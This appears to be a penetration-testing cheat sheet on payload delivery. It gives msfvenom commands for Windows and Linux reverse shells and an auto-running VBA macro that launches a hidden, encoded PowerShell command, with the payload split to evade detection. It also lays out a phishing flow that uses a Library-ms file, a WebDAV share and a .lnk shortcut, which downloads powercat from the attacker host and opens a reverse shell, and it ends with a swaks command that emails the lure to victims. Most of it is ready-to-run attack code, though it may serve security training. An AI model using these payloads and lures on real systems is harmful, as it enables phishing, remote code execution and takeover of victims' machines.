Payload Delivery

Shellcode Generation (msfvenom)

Basic Syntax 

msfvenom -p windows/shell_reverse_tcp LHOST=$kaliIP LPORT=443 -f powershell -v sc

msfvenom -p $payload LHOST=$targetIP LPORT=$port EXITFUNC=THREAD -f $format -a $arch --platform $platform -e $encoder > $filename

Common Payloads 

# Windows x64 reverse shell (exe)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$kaliIP LPORT=443 -f exe -o shell.exe

# Windows x64 reverse shell (PowerShell)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$kaliIP LPORT=443 -f powershell -v sc

# Windows reverse shell (DLL for DLL hijacking)
msfvenom -p windows/x64/shell/reverse_tcp LHOST=$kaliIP LPORT=4444 -f dll -o msf.dll

# Windows MSI (for AlwaysInstallElevated)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$kaliIP LPORT=$port -f msi -o malicious.msi

# Linux reverse shell (ELF)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$kaliIP LPORT=443 -f elf -o shell.elf

Encoding Shellcode for Macro Embedding

Use the -f powershell format then encode to base64:

msfvenom -p windows/shell_reverse_tcp LHOST=$kaliIP LPORT=443 -f powershell -v sc

Then in PowerShell:

$str = "powershell.exe -nop -w hidden -e <base64>"

Python helper to split long string for macro:

str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."
n = 50
for i in range(0, len(str), n):
    print('Str = Str + "' + str[i:i+n] + '"')

Microsoft Office Macros

VBA Macro Template 

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    ' ... continue split string ...
    Str = Str + "A== "
    CreateObject("Wscript.Shell").Run Str
End Sub
  • AutoOpen() triggers when the file is opened via the file system
  • Document_Open() triggers when opened via the Word Application object
  • Payload is split into chunks to avoid detection/length limits
  • Use the Python helper above to generate the split string

Windows Library Files (.Library-ms)

Windows Library files connect users with data stored in remote locations (WebDAV shares or web services). This technique avoids spam filters by serving the payload from WebDAV rather than directly.

Attack Flow

  1. Create a WebDAV share on Kali hosting a malicious .lnk file
  2. Create a config.Library-ms file pointing to the WebDAV share
  3. Send the .Library-ms to the victim (via email, etc.)
  4. Victim opens the library file → sees your WebDAV directory → clicks the .lnk file → shell

Step 1: Set Up WebDAV Server (Kali) 

mkdir /home/kali/webdav
touch /home/kali/webdav/test.txt
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav

Step 2: Create config.Library-ms 

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://$kaliIP</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Replace $kaliIP with your Kali IP. Save as config.Library-ms.

WebDAV + LNK Payloads

Step 3: Create the .lnk Shortcut (on Windows)

  1. Right-click Desktop → New → Shortcut
  2. Target command: 
    powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://$kaliIP/powercat.ps1'); powercat -c $kaliIP -p 4444 -e powershell"
  3. Save with a convincing name (e.g., “Important Document.lnk”)
  4. Copy to /home/kali/webdav/

Also serve powercat.ps1 from port 80 and listen on port 4444.

Step 4: Deliver via Email (Swaks) 

sudo swaks -t victim@domain.com -t victim2@domain.com \
  --from attacker@domain.com \
  --attach @config.Library-ms \
  --server $mailServerIP \
  --body @body.txt \
  --header "Subject: Example Email" \
  --suppress-data \
  -ap
  • -t = to recipient(s)
  • --attach = attach the library file
  • --suppress-data = summarize SMTP transaction info
  • -ap = enable password authentication